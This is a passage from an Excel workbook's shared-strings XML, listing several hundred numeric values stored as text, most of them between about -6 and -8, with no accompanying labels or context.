  </si>
  <si>
    <t>-6.97545</t>
  </si>
  <si>
    <t>-6.99979</t>
  </si>
  <si>
    <t>-6.97456</t>
  </si>
  <si>
    <t>-6.95132</t>
  </si>
  <si>
    <t>-7.05255</t>
  </si>
  <si>
    <t>-6.96265</t>
  </si>
  <si>
    <t>-7.82442</t>
  </si>
  <si>
    <t>-7.82665</t>
  </si>
  <si>
    <t>-7.82537</t>
  </si>
  <si>
    <t>-7.64531</t>
  </si>
  <si>
    <t>-7.81993</t>
  </si>
  <si>
    <t>-6.96007</t>
  </si>
  <si>
    <t>-6.96057</t>
  </si>
  <si>
    <t>-6.97714</t>
  </si>
  <si>
    <t>-7.59198</t>
  </si>
  <si>
    <t>-7.05320</t>
  </si>
  <si>
    <t>-6.96470</t>
  </si>
  <si>
    <t>-6.95332</t>
  </si>
  <si>
    <t>-6.96309</t>
  </si>
  <si>
    <t>-6.95382</t>
  </si>
  <si>
    <t>-6.97307</t>
  </si>
  <si>
    <t>-6.96753</t>
  </si>
  <si>
    <t>-6.96585</t>
  </si>
  <si>
    <t>-6.29171</t>
  </si>
  <si>
    <t>-6.96845</t>
  </si>
  <si>
    <t>-6.89970</t>
  </si>
  <si>
    <t>-6.22466</t>
  </si>
  <si>
    <t>-6.22095</t>
  </si>
  <si>
    <t>-6.19797</t>
  </si>
  <si>
    <t>-6.12792</t>
  </si>
  <si>
    <t>-6.14614</t>
  </si>
  <si>
    <t>-6.17040</t>
  </si>
  <si>
    <t>-6.14082</t>
  </si>
  <si>
    <t>-6.14681</t>
  </si>
  <si>
    <t>-6.14760</t>
  </si>
  <si>
    <t>-6.16614</t>
  </si>
  <si>
    <t>-6.16648</t>
  </si>
  <si>
    <t>-6.09759</t>
  </si>
  <si>
    <t>-6.97250</t>
  </si>
  <si>
    <t>-6.15206</t>
  </si>
  <si>
    <t>-6.15556</t>
  </si>
  <si>
    <t>-6.16582</t>
  </si>
  <si>
    <t>-6.15408</t>
  </si>
  <si>
    <t>-6.23217</t>
  </si>
  <si>
    <t>-6.95677</t>
  </si>
  <si>
    <t>-6.24667</t>
  </si>
  <si>
    <t>-6.18426</t>
  </si>
  <si>
    <t>-7.88944</t>
  </si>
  <si>
    <t>-6.97574</t>
  </si>
  <si>
    <t>-6.14509</t>
  </si>
  <si>
    <t>-6.14640</t>
  </si>
  <si>
    <t>-6.87315</t>
  </si>
  <si>
    <t>-6.41863</t>
  </si>
  <si>
    <t>-6.26675</t>
  </si>
  <si>
    <t>-8.66968</t>
  </si>
  <si>
    <t>-6.16649</t>
  </si>
  <si>
    <t>-6.39271</t>
  </si>
  <si>
    <t>-6.97585</t>
  </si>
  <si>
    <t>-6.47073</t>
  </si>
  <si>
    <t>-6.45889</t>
  </si>
  <si>
    <t>-6.15600</t>
  </si>
  <si>
    <t>-6.15626</t>
  </si>
  <si>
    <t>-6.15816</t>
  </si>
  <si>
    <t>-6.14763</t>
  </si>
  <si>
    <t>-6.33447</t>
  </si>
  <si>
    <t>-6.21611</t>
  </si>
  <si>
    <t>-6.45686</t>
  </si>
  <si>
    <t>-6.21928</t>
  </si>
  <si>
    <t>-6.97885</t>
  </si>
  <si>
    <t>-6.65637</t>
  </si>
  <si>
    <t>-6.22426</t>
  </si>
  <si>
    <t>-6.21628</t>
  </si>
  <si>
    <t>-6.21585</t>
  </si>
  <si>
    <t>-6.31853</t>
  </si>
  <si>
    <t>-6.41683</t>
  </si>
  <si>
    <t>-6.46996</t>
  </si>
  <si>
    <t>-6.28627</t>
  </si>
  <si>
    <t>-6.34514</t>
  </si>
  <si>
    <t>-6.27167</t>
  </si>
  <si>
    <t>-6.22110</t>
  </si>
  <si>
    <t>-6.73003</t>
  </si>
  <si>
    <t>-6.96369</t>
  </si>
  <si>
    <t>-6.19592</t>
  </si>
  <si>
    <t>-6.96255</t>
  </si>
  <si>
    <t>-6.12028</t>
  </si>
  <si>
    <t>-6.44410</t>
  </si>
  <si>
    <t>-6.29412</t>
  </si>
  <si>
    <t>-6.95629</t>
  </si>
  <si>
    <t>-6.21391</t>
  </si>
  <si>
    <t>-6.22294</t>
  </si>
  <si>
    <t>-6.22146</t>
  </si>
  <si>
    <t>-6.22996</t>
  </si>
  <si>
    <t>-6.26229</t>
  </si>
  <si>
    <t>-6.15680</t>
  </si>
  <si>
    <t>-6.22106</t>
  </si>
  <si>
    <t>-6.18739</t>
  </si>
  <si>
    <t>-6.30220</t>
  </si>
  <si>
    <t>-6.18682</t>
  </si>
  <si>
    <t>-6.10105</t>
  </si>
  <si>
    <t>-6.10192</t>
  </si>
  <si>
    <t>-6.27130</t>
  </si>
  <si>
    <t>-6.55958</t>
  </si>
  <si>
    <t>-6.28416</t>
  </si>
  <si>
    <t>-6.15789</t>
  </si>
  <si>
    <t>-6.16080</t>
  </si>
  <si>
    <t>-6.16646</t>
  </si>
  <si>
    <t>-6.13273</t>
  </si>
  <si>
    <t>-6.31939</t>
  </si>
  <si>
    <t>-6.16650</t>
  </si>
  <si>
    <t>-6.27570</t>
  </si>
  <si>
    <t>-6.21547</t>
  </si>
  <si>
    <t>-6.16643</t>
  </si>
  <si>
    <t>-6.31979</t>
  </si>
  <si>
    <t>-6.25945</t>
  </si>
  <si>
    <t>-7.55293</t>
  </si>
  <si>
    <t>-6.95568</t>
  </si>
  <si>
    <t>-6.92699</t>
  </si>
  <si>
    <t>-6.88683</t>
  </si>
  <si>
    <t>-6.14064</t>
  </si>
  <si>
    <t>-3.36879</t>
  </si>
  <si>
    <t>-5.17325</t>
  </si>
  <si>
    <t>1.48779</t>
  </si>
  <si>
    <t>-4.93571</t>
  </si>
  <si>
    <t>-8.12793</t>
  </si>
  <si>
    <t>-3.35092</t>
  </si>
  <si>
    <t>-8.17094</t>
  </si>
  <si>
    <t>-7.66318</t>
  </si>
  <si>
    <t>-6.39800</t>
  </si>
  <si>
    <t>-7.57948</t>
  </si>
  <si>
    <t>1.46136</t>
  </si>
  <si>
    <t>-6.95841</t>
  </si>
  <si>
    <t>-6.84336</t>
  </si>
  <si>
    <t>3.53690</t>
  </si>
  <si>
    <t>-6.24843</t>
  </si>
  <si>
    <t>-6.84166</t>
  </si>
  <si>
    <t>-6.10136</t>
  </si>
  <si>
    <t>-6.32209</t>
  </si>
  <si>
    <t>-6.28470</t>
  </si>
  <si>
    <t>-7.55987</t>
  </si>
  <si>
    <t>-6.45441</t>
  </si>
  <si>
    <t>-6.26007</t>
  </si>
  <si>
    <t>-6.96272</t>
  </si>
  <si>
    <t>-3.03667</t>
  </si>
  <si>
    <t>-6.29224</t>
  </si>
  <si>
    <t>-6.38503</t>
  </si>
  <si>
    <t>-7.78676</t>
  </si>
  <si>
    <t>-6.87675</t>
  </si>
  <si>
    <t>-8.17722</t>
  </si>
  <si>
    <t>-6.88050</t>
  </si>
  <si>
    <t>-3.03663</t>
  </si>
  <si>
    <t>-6.14559</t>
  </si>
  <si>
    <t>-8.17698</t>
  </si>
  <si>
    <t>-6.84195</t>
  </si>
  <si>
    <t>-6.95165</t>
  </si>
  <si>
    <t>-6.40135</t>
  </si>
  <si>
    <t>-6.28528</t>
  </si>
  <si>
    <t>-6.23758</t>
  </si>
  <si>
    <t>-6.33517</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.89575</t>
  </si>
  <si>
    <t>-7.60704</t>
  </si>
  <si>
    <t>-7.51217</t>
  </si>
  <si>
    <t>-7.61174</t>
  </si>
  <si>
    <t>-6.16089</t>
  </si>
  <si>
    <t>-7.67966</t>
  </si>
  <si>
    <t>-7.46096</t>
  </si>
  <si>
    <t>-6.10417</t>
  </si>
  <si>
    <t>-7.60989</t>
  </si>
  <si>
    <t>-7.71358</t>
  </si>
  <si>
    <t>-6.16073</t>
  </si>
  <si>
    <t>-6.20222</t>
  </si>
  <si>
    <t>-6.21023</t>
  </si>
  <si>
    <t>-6.17658</t>
  </si>
  <si>
    <t>-6.21909</t>
  </si>
  <si>
    <t>-6.21612</t>
  </si>
  <si>
    <t>-6.21613</t>
  </si>
  <si>
    <t>-7.45415</t>
  </si>
  <si>
    <t>-7.86578</t>
  </si>
  <si>
    <t>-6.20646</t>
  </si>
  <si>
    <t>-6.20715</t>
  </si>
  <si>
    <t>-6.20598</t>
  </si>
  <si>
    <t>-6.20640</t>
  </si>
  <si>
    <t>-6.17069</t>
  </si>
  <si>
    <t>-6.18926</t>
  </si>
  <si>
    <t>-6.15660</t>
  </si>
  <si>
    <t>-6.13428</t>
  </si>
  <si>
    <t>-6.11948</t>
  </si>
  <si>
    <t>-6.22875</t>
  </si>
  <si>
    <t>-6.20199</t>
  </si>
  <si>
    <t>-6.17272</t>
  </si>
  <si>
    <t>-6.31596</t>
  </si>
  <si>
    <t>-6.18003</t>
  </si>
  <si>
    <t>-6.16664</t>
  </si>
  <si>
    <t>-6.20555</t>
  </si>
  <si>
    <t>-6.20406</t>
  </si>
  <si>
    <t>-6.17514</t>
  </si>
  <si>
    <t>-6.11840</t>
  </si>
  <si>
    <t>-6.11846</t>
  </si>
  <si>
    <t>-6.09974</t>
  </si>
  <si>
    <t>-6.15682</t>
  </si>
  <si>
    <t>-6.15523</t>
  </si>
  <si>
    <t>-6.16056</t>
  </si>
  <si>
    <t>-6.24089</t>
  </si>
  <si>
    <t>-6.15513</t>
  </si>
  <si>
    <t>-6.17292</t>
  </si>
  <si>
    <t>-7.45260</t>
  </si>
  <si>
    <t>-6.87162</t>
  </si>
  <si>
    <t>-7.82522</t>
  </si>
  <si>
    <t>2.19110</t>
  </si>
  <si>
    <t>-6.14287</t>
  </si>
  <si>
    <t>-7.27031</t>
  </si>
  <si>
    <t>-8.80494</t>
  </si>
  <si>
    <t>-6.86222</t>
  </si>
  <si>
    <t>-6.25326</t>
  </si>
  <si>
    <t>-6.24653</t>
  </si>
  <si>
    <t>-6.24132</t>
  </si>
  <si>
    <t>-6.20867</t>
  </si>
  <si>
    <t>-6.20843</t>
  </si>
  <si>
    <t>-6.24126</t>
  </si>
  <si>
    <t>-6.21865</t>
  </si>
  <si>
    <t>-6.22608</t>
  </si>
  <si>
    <t>-6.22345</t>
  </si>
  <si>
    <t>-6.22198</t>
  </si>
  <si>
    <t>-6.13031</t>
  </si>
  <si>
    <t>-6.89106</t>
  </si>
  <si>
    <t>-6.20822</t>
  </si>
  <si>
    <t>-6.20851</t>
  </si>
  <si>
    <t>-6.23697</t>
  </si>
  <si>
    <t>-6.20849</t>
  </si>
  <si>
    <t>-6.22822</t>
  </si>
  <si>
    <t>-6.21836</t>
  </si>
  <si>
    <t>-6.20816</t>
  </si>
  <si>
    <t>-6.25085</t>
  </si>
  <si>
    <t>-6.27535</t>
  </si>
  <si>
    <t>-6.21634</t>
  </si>
  <si>
    <t>-6.23330</t>
  </si>
  <si>
    <t>-6.25947</t>
  </si>
  <si>
    <t>-6.23914</t>
  </si>
  <si>
    <t>-6.24743</t>
  </si>
  <si>
    <t>-6.30214</t>
  </si>
  <si>
    <t>-6.23238</t>
  </si>
  <si>
    <t>-6.23546</t>
  </si>
  <si>
    <t>-6.28176</t>
  </si>
  <si>
    <t>-6.20833</t>
  </si>
  <si>
    <t>-6.23060</t>
  </si>
  <si>
    <t>-6.20801</t>
  </si>
  <si>
    <t>-6.27511</t>
  </si>
  <si>
    <t>-6.24108</t>
  </si>
  <si>
    <t>-6.24090</t>
  </si>
  <si>
    <t>-6.22319</t>
  </si>
  <si>
    <t>-6.26580</t>
  </si>
  <si>
    <t>-6.23927</t>
  </si>
  <si>
    <t>-6.23318</t>
  </si>
  <si>
    <t>-6.26632</t>
  </si>
  <si>
    <t>-6.24760</t>
  </si>
  <si>
    <t>-6.23640</t>
  </si>
  <si>
    <t>-6.24229</t>
  </si>
  <si>
    <t>-6.25807</t>
  </si>
  <si>
    <t>-6.26430</t>
  </si>
  <si>
    <t>-6.26876</t>
  </si>
  <si>
    <t>-6.22241</t>
  </si>
  <si>
    <t>-6.24113</t>
  </si>
  <si>
    <t>-5.28289</t>
  </si>
  <si>
    <t>-6.21136</t>
  </si>
  <si>
    <t>-6.26239</t>
  </si>
  <si>
    <t>-6.26585</t>
  </si>
  <si>
    <t>-6.13487</t>
  </si>
  <si>
    <t>-6.27839</t>
  </si>
  <si>
    <t>-6.28543</t>
  </si>
  <si>
    <t>-6.25944</t>
  </si>
  <si>
    <t>-6.25856</t>
  </si>
  <si>
    <t>-6.30387</t>
  </si>
  <si>
    <t>-6.28893</t>
  </si>
  <si>
    <t>-6.25906</t>
  </si>
  <si>
    <t>-6.24050</t>
  </si>
  <si>
    <t>-6.24757</t>
  </si>
  <si>
    <t>-6.28312</t>
  </si>
  <si>
    <t>-6.27480</t>
  </si>
  <si>
    <t>-6.24115</t>
  </si>
  <si>
    <t>-6.25555</t>
  </si>
  <si>
    <t>-6.25684</t>
  </si>
  <si>
    <t>-6.24061</t>
  </si>
  <si>
    <t>-6.24918</t>
  </si>
  <si>
    <t>-6.24938</t>
  </si>
  <si>
    <t>-6.22546</t>
  </si>
  <si>
    <t>-6.24934</t>
  </si>
  <si>
    <t>-6.23883</t>
  </si>
  <si>
    <t>-6.27806</t>
  </si>
  <si>
    <t>-6.25458</t>
  </si>
  <si>
    <t>-6.24688</t>
  </si>
  <si>
    <t>-6.33144</t>
  </si>
  <si>
    <t>-6.33076</t>
  </si>
  <si>
    <t>-6.28949</t>
  </si>
  <si>
    <t>-6.23913</t>
  </si>
  <si>
    <t>-6.31841</t>
  </si>
  <si>
    <t>-6.26552</t>
  </si>
  <si>
    <t>-6.26683</t>
  </si>
  <si>
    <t>-6.34851</t>
  </si>
  <si>
    <t>-6.25140</t>
  </si>
  <si>
    <t>-6.32194</t>
  </si>
  <si>
    <t>-6.27749</t>
  </si>
  <si>
    <t>-6.33236</t>
  </si>
  <si>
    <t>-6.21545</t>
  </si>
  <si>
    <t>-6.24610</t>
  </si>
  <si>
    <t>-6.24421</t>
  </si>
  <si>
    <t>-6.26063</t>
  </si>
  <si>
    <t>-6.26716</t>
  </si>
  <si>
    <t>-6.19237</t>
  </si>
  <si>
    <t>-6.31802</t>
  </si>
  <si>
    <t>-6.30213</t>
  </si>
  <si>
    <t>-6.25705</t>
  </si>
  <si>
    <t>-6.28278</t>
  </si>
  <si>
    <t>-6.28184</t>
  </si>
  <si>
    <t>-6.30812</t>
  </si>
  <si>
    <t>-6.25869</t>
  </si>
  <si>
    <t>-6.25762</t>
  </si>
  <si>
    <t>-6.30341</t>
  </si>
  <si>
    <t>-6.19314</t>
  </si>
  <si>
    <t>-6.30106</t>
  </si>
  <si>
    <t>-6.27632</t>
  </si>
  <si>
    <t>-6.26225</t>
  </si>
  <si>
    <t>-6.32732</t>
  </si>
  <si>
    <t>-6.24726</t>
  </si>
  <si>
    <t>-6.28670</t>
  </si>
  <si>
    <t>-6.31868</t>
  </si>
  <si>
    <t>-6.22938</t>
  </si>
  <si>
    <t>-6.38208</t>
  </si>
  <si>
    <t>-6.34854</t>
  </si>
  <si>
    <t>-6.24956</t>
  </si>
  <si>
    <t>-6.22925</t>
  </si>
  <si>
    <t>-6.24710</t>
  </si>
  <si>
    <t>-6.31793</t>
  </si>
  <si>
    <t>-6.21261</t>
  </si>
  <si>
    <t>-6.34059</t>
  </si>
  <si>
    <t>-6.23957</t>
  </si>
  <si>
    <t>-6.14031</t>
  </si>
  <si>
    <t>-6.25019</t>
  </si>
  <si>
    <t>-6.23460</t>
  </si>
  <si>
    <t>-6.25872</t>
  </si>
  <si>
    <t>-6.22403</t>
  </si>
  <si>
    <t>-6.16463</t>
  </si>
  <si>
    <t>-6.24576</t>
  </si>
  <si>
    <t>-6.33733</t>
  </si>
  <si>
    <t>-6.32311</t>
  </si>
  <si>
    <t>-6.28688</t>
  </si>
  <si>
    <t>-6.31780</t>
  </si>
  <si>
    <t>-6.26360</t>
  </si>
  <si>
    <t>-6.28677</t>
  </si>
  <si>
    <t>-6.26231</t>
  </si>
  <si>
    <t>-6.25455</t>
  </si>
  <si>
    <t>-6.26161</t>
  </si>
  <si>
    <t>-6.23638</t>
  </si>
  <si>
    <t>-6.28564</t>
  </si>
  <si>
    <t>-6.26855</t>
  </si>
  <si>
    <t>-6.26851</t>
  </si>
  <si>
    <t>-6.28553</t>
  </si>
  <si>
    <t>-6.24728</t>
  </si>
  <si>
    <t>-6.28391</t>
  </si>
  <si>
    <t>-6.28854</t>
  </si>
  <si>
    <t>-6.28699</t>
  </si>
  <si>
    <t>-6.28322</t>
  </si>
  <si>
    <t>-6.25731</t>
  </si>
  <si>
    <t>-6.32505</t>
  </si>
  <si>
    <t>-6.27090</t>
  </si>
  <si>
    <t>-6.32326</t>
  </si>
  <si>
    <t>-6.21982</t>
  </si>
  <si>
    <t>-6.22304</t>
  </si>
  <si>
    <t>-6.23281</t>
  </si>
  <si>
    <t>-6.30993</t>
  </si>
  <si>
    <t>-6.18147</t>
  </si>
  <si>
    <t>-6.23768</t>
  </si>
  <si>
    <t>-6.22653</t>
  </si>
  <si>
    <t>-6.88800</t>
  </si>
  <si>
    <t>-6.28865</t>
  </si>
  <si>
    <t>-6.30007</t>
  </si>
  <si>
    <t>-6.24835</t>
  </si>
  <si>
    <t>-6.28229</t>
  </si>
  <si>
    <t>-6.29863</t>
  </si>
  <si>
    <t>-6.26718</t>
  </si>
  <si>
    <t>-7.18493</t>
  </si>
  <si>
    <t>-6.28471</t>
  </si>
  <si>
    <t>-6.13654</t>
  </si>
  <si>
    <t>-6.26109</t>
  </si>
  <si>
    <t>-6.18425</t>
  </si>
  <si>
    <t>-6.13876</t>
  </si>
  <si>
    <t>-6.15709</t>
  </si>
  <si>
    <t>-6.28857</t>
  </si>
  <si>
    <t>-6.28252</t>
  </si>
  <si>
    <t>-6.23462</t>
  </si>
  <si>
    <t>-6.15718</t>
  </si>
  <si>
    <t>-6.25892</t>
  </si>
  <si>
    <t>-6.16672</t>
  </si>
  <si>
    <t>-6.37718</t>
  </si>
  <si>
    <t>-6.25980</t>
  </si>
  <si>
    <t>-6.28944</t>
  </si>
  <si>
    <t>-6.23247</t>
  </si>
  <si>
    <t>-6.24847</t>
  </si>
  <si>
    <t>-6.22972</t>
  </si>
  <si>
    <t>-6.25584</t>
  </si>
  <si>
    <t>-6.22436</t>
  </si>
  <si>
    <t>-6.26195</t>
  </si>
  <si>
    <t>-6.28431</t>
  </si>
  <si>
    <t>-6.35113</t>
  </si>
  <si>
    <t>-6.13831</t>
  </si>
  <si>
    <t>-6.21158</t>
  </si>
  <si>
    <t>-6.33970</t>
  </si>
  <si>
    <t>-6.25875</t>
  </si>
  <si>
    <t>-6.23056</t>
  </si>
  <si>
    <t>-6.29769</t>
  </si>
  <si>
    <t>-6.26870</t>
  </si>
  <si>
    <t>-6.16010</t>
  </si>
  <si>
    <t>-6.29206</t>
  </si>
  <si>
    <t>-6.28398</t>
  </si>
  <si>
    <t>-6.30912</t>
  </si>
  <si>
    <t>-6.18711</t>
  </si>
  <si>
    <t>-6.32655</t>
  </si>
  <si>
    <t>-6.21552</t>
  </si>
  <si>
    <t>-6.26055</t>
  </si>
  <si>
    <t>-6.21388</t>
  </si>
  <si>
    <t>-6.32233</t>
  </si>
  <si>
    <t>-6.32234</t>
  </si>
  <si>
    <t>-6.26606</t>
  </si>
  <si>
    <t>-6.16444</t>
  </si>
  <si>
    <t>-6.29329</t>
  </si>
  <si>
    <t>-6.15931</t>
  </si>
  <si>
    <t>-6.21693</t>
  </si>
  <si>
    <t>-6.31968</t>
  </si>
  <si>
    <t>-6.26797</t>
  </si>
  <si>
    <t>-6.30406</t>
  </si>
  <si>
    <t>-6.19307</t>
  </si>
  <si>
    <t>-6.23761</t>
  </si>
  <si>
    <t>-6.31815</t>
  </si>
  <si>
    <t>-6.16108</t>
  </si>
  <si>
    <t>-6.29672</t>
  </si>
  <si>
    <t>-6.19951</t>
  </si>
  <si>
    <t>-7.04222</t>
  </si>
  <si>
    <t>-6.26057</t>
  </si>
  <si>
    <t>-6.21380</t>
  </si>
  <si>
    <t>-6.26506</t>
  </si>
  <si>
    <t>-6.24680</t>
  </si>
  <si>
    <t>-6.28735</t>
  </si>
  <si>
    <t>-6.27635</t>
  </si>
  <si>
    <t>-6.25045</t>
  </si>
  <si>
    <t>-6.28222</t>
  </si>
  <si>
    <t>-6.30859</t>
  </si>
  <si>
    <t>-6.27697</t>
  </si>
  <si>
    <t>-6.33726</t>
  </si>
  <si>
    <t>-6.37305</t>
  </si>
  <si>
    <t>-6.27088</t>
  </si>
  <si>
    <t>-6.27653</t>
  </si>
  <si>
    <t>-6.31684</t>
  </si>
  <si>
    <t>-6.33112</t>
  </si>
  <si>
    <t>-6.23755</t>
  </si>
  <si>
    <t>-6.28185</t>
  </si>
  <si>
    <t>-6.16501</t>
  </si>
  <si>
    <t>-6.27401</t>
  </si>
  <si>
    <t>-6.26001</t>
  </si>
  <si>
    <t>-6.20285</t>
  </si>
  <si>
    <t>-6.21744</t>
  </si>
  <si>
    <t>-6.25264</t>
  </si>
  <si>
    <t>-6.23419</t>
  </si>
  <si>
    <t>-6.19714</t>
  </si>
  <si>
    <t>-6.26849</t>
  </si>
  <si>
    <t>-6.26942</t>
  </si>
  <si>
    <t>-6.27320</t>
  </si>
  <si>
    <t>-6.23878</t>
  </si>
  <si>
    <t>-6.17829</t>
  </si>
  <si>
    <t>-6.28992</t>
  </si>
  <si>
    <t>-6.31521</t>
  </si>
  <si>
    <t>-6.26212</t>
  </si>
  <si>
    <t>-6.25177</t>
  </si>
  <si>
    <t>-6.21729</t>
  </si>
  <si>
    <t>-6.28165</t>
  </si>
  <si>
    <t>-6.25608</t>
  </si>
  <si>
    <t>-6.28473</t>
  </si>
  <si>
    <t>-6.30126</t>
  </si>
  <si>
    <t>-6.31102</t>
  </si>
  <si>
    <t>-6.24669</t>
  </si>
  <si>
    <t>-6.28420</t>
  </si>
  <si>
    <t>-6.23321</t>
  </si>
  <si>
    <t>-6.23551</t>
  </si>
  <si>
    <t>-6.26234</t>
  </si>
  <si>
    <t>-6.25676</t>
  </si>
  <si>
    <t>-6.28379</t>
  </si>
  <si>
    <t>-6.29550</t>
  </si>
  <si>
    <t>-6.44028</t>
  </si>
  <si>
    <t>-6.33175</t>
  </si>
  <si>
    <t>-6.24419</t>
  </si>
  <si>
    <t>-6.28194</t>
  </si>
  <si>
    <t>-6.25447</t>
  </si>
  <si>
    <t>-6.13846</t>
  </si>
  <si>
    <t>-6.23290</t>
  </si>
  <si>
    <t>-6.17815</t>
  </si>
  <si>
    <t>-6.28568</t>
  </si>
  <si>
    <t>-6.30317</t>
  </si>
  <si>
    <t>-6.23293</t>
  </si>
  <si>
    <t>-6.23424</t>
  </si>
  <si>
    <t>-6.17108</t>
  </si>
  <si>
    <t>-6.27871</t>
  </si>
  <si>
    <t>-6.21246</t>
  </si>
  <si>
    <t>-6.22308</t>
  </si>
  <si>
    <t>-6.28894</t>
  </si>
  <si>
    <t>-6.16513</t>
  </si>
  <si>
    <t>-6.32125</t>
  </si>
  <si>
    <t>-6.21705</t>
  </si>
  <si>
    <t>-6.21356</t>
  </si>
  <si>
    <t>-6.34085</t>
  </si>
  <si>
    <t>-6.21432</t>
  </si>
  <si>
    <t>-6.28711</t>
  </si>
  <si>
    <t>-6.25226</t>
  </si>
  <si>
    <t>-6.27234</t>
  </si>
  <si>
    <t>-6.21205</t>
  </si>
  <si>
    <t>-6.20237</t>
  </si>
  <si>
    <t>-6.23711</t>
  </si>
  <si>
    <t>-6.26559</t>
  </si>
  <si>
    <t>-6.19429</t>
  </si>
  <si>
    <t>-6.29087</t>
  </si>
  <si>
    <t>-6.29473</t>
  </si>
  <si>
    <t>-6.24391</t>
  </si>
  <si>
    <t>-6.28441</t>
  </si>
  <si>
    <t>-6.20298</t>
  </si>
  <si>
    <t>-6.26512</t>
  </si>
  <si>
    <t>-6.32310</t>
  </si>
  <si>
    <t>-6.32313</t>
  </si>
  <si>
    <t>-6.32308</t>
  </si>
  <si>
    <t>-6.26509</t>
  </si>
  <si>
    <t>-6.25439</t>
  </si>
  <si>
    <t>-6.31740</t>
  </si>
  <si>
    <t>-6.31382</t>
  </si>
  <si>
    <t>-6.18933</t>
  </si>
  <si>
    <t>-6.27433</t>
  </si>
  <si>
    <t>-6.31615</t>
  </si>
  <si>
    <t>-6.20267</t>
  </si>
  <si>
    <t>-6.20252</t>
  </si>
  <si>
    <t>-6.15744</t>
  </si>
  <si>
    <t>-6.24198</t>
  </si>
  <si>
    <t>-6.20533</t>
  </si>
  <si>
    <t>-6.25489</t>
  </si>
  <si>
    <t>-6.28975</t>
  </si>
  <si>
    <t>-6.25946</t>
  </si>
  <si>
    <t>-6.33007</t>
  </si>
  <si>
    <t>-6.21353</t>
  </si>
  <si>
    <t>-6.21906</t>
  </si>
  <si>
    <t>-6.18483</t>
  </si>
  <si>
    <t>-6.36542</t>
  </si>
  <si>
    <t>-6.27354</t>
  </si>
  <si>
    <t>-6.20114</t>
  </si>
  <si>
    <t>-6.22562</t>
  </si>
  <si>
    <t>-6.18402</t>
  </si>
  <si>
    <t>-6.18900</t>
  </si>
  <si>
    <t>-6.20288</t>
  </si>
  <si>
    <t>-6.18716</t>
  </si>
  <si>
    <t>-6.27139</t>
  </si>
  <si>
    <t>-6.30277</t>
  </si>
  <si>
    <t>-6.16618</t>
  </si>
  <si>
    <t>-6.29813</t>
  </si>
  <si>
    <t>-6.23539</t>
  </si>
  <si>
    <t>-6.20388</t>
  </si>
  <si>
    <t>-6.23713</t>
  </si>
  <si>
    <t>-6.19571</t>
  </si>
  <si>
    <t>-6.19569</t>
  </si>
  <si>
    <t>-6.24664</t>
  </si>
  <si>
    <t>-6.32135</t>
  </si>
  <si>
    <t>-6.31454</t>
  </si>
  <si>
    <t>-6.27225</t>
  </si>
  <si>
    <t>-6.26194</t>
  </si>
  <si>
    <t>-6.32688</t>
  </si>
  <si>
    <t>-6.31395</t>
  </si>
  <si>
    <t>-6.23071</t>
  </si>
  <si>
    <t>-6.23054</t>
  </si>
  <si>
    <t>-6.23379</t>
  </si>
  <si>
    <t>-6.24304</t>
  </si>
  <si>
    <t>-6.22238</t>
  </si>
  <si>
    <t>-6.21929</t>
  </si>
  <si>
    <t>-6.24296</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47446</t>
  </si>
  <si>
    <t>-6.16749</t>
  </si>
  <si>
    <t>-6.26275</t>
  </si>
  <si>
    <t>-6.29715</t>
  </si>
  <si>
    <t>-6.16735</t>
  </si>
  <si>
    <t>-6.23157</t>
  </si>
  <si>
    <t>-6.25544</t>
  </si>
  <si>
    <t>-6.16847</t>
  </si>
  <si>
    <t>-6.24080</t>
  </si>
  <si>
    <t>-6.21985</t>
  </si>
  <si>
    <t>-6.22203</t>
  </si>
  <si>
    <t>-6.18333</t>
  </si>
  <si>
    <t>-6.25121</t>
  </si>
  <si>
    <t>-6.24227</t>
  </si>
  <si>
    <t>-6.29614</t>
  </si>
  <si>
    <t>-6.35494</t>
  </si>
  <si>
    <t>-6.30435</t>
  </si>
  <si>
    <t>-6.26705</t>
  </si>
  <si>
    <t>-6.23524</t>
  </si>
  <si>
    <t>-6.22610</t>
  </si>
  <si>
    <t>-6.27683</t>
  </si>
  <si>
    <t>-6.74691</t>
  </si>
  <si>
    <t>-6.23366</t>
  </si>
  <si>
    <t>-6.16755</t>
  </si>
  <si>
    <t>-6.15968</t>
  </si>
  <si>
    <t>-6.18524</t>
  </si>
  <si>
    <t>-6.33174</t>
  </si>
  <si>
    <t>-6.22247</t>
  </si>
  <si>
    <t>-6.26602</t>
  </si>
  <si>
    <t>-7.89433</t>
  </si>
  <si>
    <t>-6.18447</t>
  </si>
  <si>
    <t>-6.22227</t>
  </si>
  <si>
    <t>-6.15999</t>
  </si>
  <si>
    <t>-6.15958</t>
  </si>
  <si>
    <t>-6.22425</t>
  </si>
  <si>
    <t>-6.17991</t>
  </si>
  <si>
    <t>-6.27340</t>
  </si>
  <si>
    <t>-6.17583</t>
  </si>
  <si>
    <t>-6.16722</t>
  </si>
  <si>
    <t>-6.19337</t>
  </si>
  <si>
    <t>-6.14213</t>
  </si>
  <si>
    <t>-6.16837</t>
  </si>
  <si>
    <t>-6.17545</t>
  </si>
  <si>
    <t>-6.27148</t>
  </si>
  <si>
    <t>-6.16963</t>
  </si>
  <si>
    <t>-6.37710</t>
  </si>
  <si>
    <t>-6.31709</t>
  </si>
  <si>
    <t>-6.31936</t>
  </si>
  <si>
    <t>-6.30806</t>
  </si>
  <si>
    <t>-6.31421</t>
  </si>
  <si>
    <t>-6.15775</t>
  </si>
  <si>
    <t>-6.25492</t>
  </si>
  <si>
    <t>-6.16619</t>
  </si>
  <si>
    <t>-6.31820</t>
  </si>
  <si>
    <t>-6.13590</t>
  </si>
  <si>
    <t>-6.22033</t>
  </si>
  <si>
    <t>-6.16065</t>
  </si>
  <si>
    <t>-6.16526</t>
  </si>
  <si>
    <t>-6.20264</t>
  </si>
  <si>
    <t>-6.17529</t>
  </si>
  <si>
    <t>-6.16155</t>
  </si>
  <si>
    <t>-6.31091</t>
  </si>
  <si>
    <t>-6.37274</t>
  </si>
  <si>
    <t>-6.17543</t>
  </si>
  <si>
    <t>-6.88913</t>
  </si>
  <si>
    <t>-6.16248</t>
  </si>
  <si>
    <t>-6.24991</t>
  </si>
  <si>
    <t>-6.88424</t>
  </si>
  <si>
    <t>-6.35751</t>
  </si>
  <si>
    <t>-6.17381</t>
  </si>
  <si>
    <t>-6.20242</t>
  </si>
  <si>
    <t>-6.16291</t>
  </si>
  <si>
    <t>-6.24793</t>
  </si>
  <si>
    <t>-6.18311</t>
  </si>
  <si>
    <t>-6.18351</t>
  </si>
  <si>
    <t>-3.32613</t>
  </si>
  <si>
    <t>-6.29564</t>
  </si>
  <si>
